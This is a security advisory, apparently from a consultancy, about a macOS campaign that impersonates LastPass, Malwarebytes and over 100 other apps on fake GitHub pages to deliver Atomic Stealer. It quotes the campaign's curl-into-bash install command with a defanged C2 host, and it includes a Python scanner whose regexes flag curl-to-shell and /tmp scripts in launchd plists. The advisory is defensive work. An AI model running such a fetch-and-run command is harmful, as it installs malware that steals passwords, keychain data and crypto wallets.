Malwarebytes, LastPass, & Others Impersonated in GitHub-Based Mac Malware Operation


In September 2025, threat intelligence teams at LastPass and Malwarebytes identified a large-scale macOS-targeted malware campaign leveraging GitHub Pages and SEO manipulation to distribute Atomic Stealer (AMOS). Cybercriminals are impersonating over 100 legitimate applications, redirecting users to malicious installers that silently deploy infostealer malware. This campaign poses significant risk to organizations relying on Mac endpoints and highlights the expanding abuse of open-source platforms for malware delivery.

Severity: High

Threat Details

1. Attack Vector:

  • GitHub Pages are being weaponized to host lookalike repositories that imitate official software downloads for macOS.
  • The cybercriminals use SEO poisoning to push their fake GitHub pages to the top of search results on platforms like Google and Bing.
  • When a user searches for legitimate software like “Malwarebytes for Mac,” a malicious GitHub repository might appear as one of the first results.
  • The fraudulent pages are designed to look authentic, often mimicking the branding and appearance of the real company.

2. The Malware: Atomic Stealer (AMOS):

  • The primary payload in this campaign is the Atomic Stealer, a sophisticated malware specifically designed to target macOS.
  • It is capable of exfiltrating Keychain data, browser-stored passwords, crypto wallet data, and system profiling data.

3. Impersonated Software

  • Security: LastPass, Malwarebytes, SentinelOne, 1Password
  • Finance: Robinhood, Citibank, Fidelity, Bitpanda, E-TRADE
  • Productivity: Notion, Obsidian, Basecamp, Dropbox
  • Multimedia: DaVinci Resolve, Audacity, After Effects
  • Others: Docker, Shopify, Charles Schwab, VSCO

The full list includes more than 100 impersonated apps across a range of industries.

4. Attack Flow

  1. User searches for “Install [App] on Mac”
  2. Clicks GitHub link (e.g., github[.]com/LastPass-on-MacBook)
  3. Redirect to external site (e.g., macprograms-pro[.]com)
  4. Site instructs user to run terminal command (curl + bash)
  5. Payload downloaded from C2 (e.g., bonoud[.]com, gosreestr[.]com)
  6. “install.sh” silently downloads and installs Atomic Stealer

Example Execution Command:

/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

Recommendations

  1. Train employees and users to never install software from GitHub repositories unless they are from official vendor or developer accounts.
  2. Warn users never to run curl ... | bash or similar commands copied from unofficial pages or forums, even if they appear on seemingly legitimate GitHub pages.
  3. Encourage users to avoid clicking sponsored search results for software downloads.
  4. Always navigate to software vendors through direct URLs or official app stores.
  5. Scan Mac systems for signs of infection:
    • Look for suspicious shell scripts in /tmp, ~/Library/LaunchAgents, and startup paths.
    • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
    • Use a known clean recovery image if compromise is suspected. After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
    • Force password resets for any accounts accessed from infected systems. Invalidate browser sessions, tokens, and regenerate API keys.
  6. Block the IOCs at their respective controls:
    https://www.virustotal.com/gui/collection/56309ba015ad69d3f926a439c3914e8e0b674560166cdc2b7619980d97049603/iocs
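Step 4 of the attack flow (a terminal command that feeds curl output into bash) and recommendation 5 (sweeping LaunchAgents and LaunchDaemons for suspicious scripts) both come down to spotting launchd persistence whose command line stages a script from the network or from /tmp. The script below is an added example, not code from the advisory or from Malwarebytes or LastPass: it parses every plist in the persistence directories the advisory names and flags entries whose Program/ProgramArguments match constructed heuristics (curl fed into a shell, "sh -c", scripts under /tmp, osascript); the regexes and the treatment of unparseable plists are assumptions to tune for your fleet.

```python
import plistlib
import re
from pathlib import Path

# Persistence locations named in the advisory's scan recommendation.
DEFAULT_PERSISTENCE_DIRS = [Path.home() / "Library/LaunchAgents",
                            Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]

# Constructed heuristics for the staging pattern in the advisory
# (/bin/bash -c "$(curl -fsSL https://<c2>/install.sh)") and for scripts
# dropped in /tmp. Assumed patterns, not indicators taken from the advisory.
SUSPICIOUS_PATTERNS = {
    "curl_to_shell": re.compile(r"\$\(\s*curl\b.*\)|curl\b.*\|\s*(?:ba|z)?sh\b"),
    "shell_dash_c": re.compile(r"\b(?:ba|z)?sh\s+-c\b"),
    "tmp_script": re.compile(r"/(?:private/)?tmp/\S*\.sh\b"),
    "osascript": re.compile(r"\bosascript\b"),
}

def command_indicators(cmd):
    """Return the names of all heuristics that match one command line."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]

def inspect_plist(path):
    """Parse one launchd plist; return a finding dict, or None if it looks clean."""
    try:
        with path.open("rb") as fh:
            data = plistlib.load(fh)
    except Exception as exc:  # a plist launchd cannot parse is itself worth a look
        return {"path": str(path), "label": None, "command": None,
                "indicators": ["unparseable:" + type(exc).__name__], "run_at_load": False}
    args = data.get("ProgramArguments") or []
    args = [args] if isinstance(args, str) else args  # tolerate a malformed single string
    # launchd runs Program if set, otherwise ProgramArguments[0]; check both.
    cmd = " ".join([str(data.get("Program", ""))] + [str(a) for a in args]).strip()
    hits = command_indicators(cmd)
    if not hits:
        return None
    return {"path": str(path), "label": data.get("Label"), "command": cmd,
            "indicators": hits, "run_at_load": bool(data.get("RunAtLoad", False))}

def scan_persistence(dirs=DEFAULT_PERSISTENCE_DIRS):
    """Walk the given directories and collect a finding for every suspicious plist."""
    findings = []
    for d in dirs:
        if Path(d).is_dir():
            for plist in sorted(Path(d).glob("*.plist")):
                finding = inspect_plist(plist)
                if finding:
                    findings.append(finding)
    return findings
```

Calling scan_persistence() with no arguments on a Mac sweeps the three default directories; pass your own list of paths to cover other startup locations.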

Source:

  • https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware
  • https://blog.lastpass.com/posts/attack-targeting-macs-via-github-pages
  • https://medium.com/deriv-tech/brewing-trouble-dissecting-a-macos-malware-campaign-90c2c24de5dc



Ampcus Cyber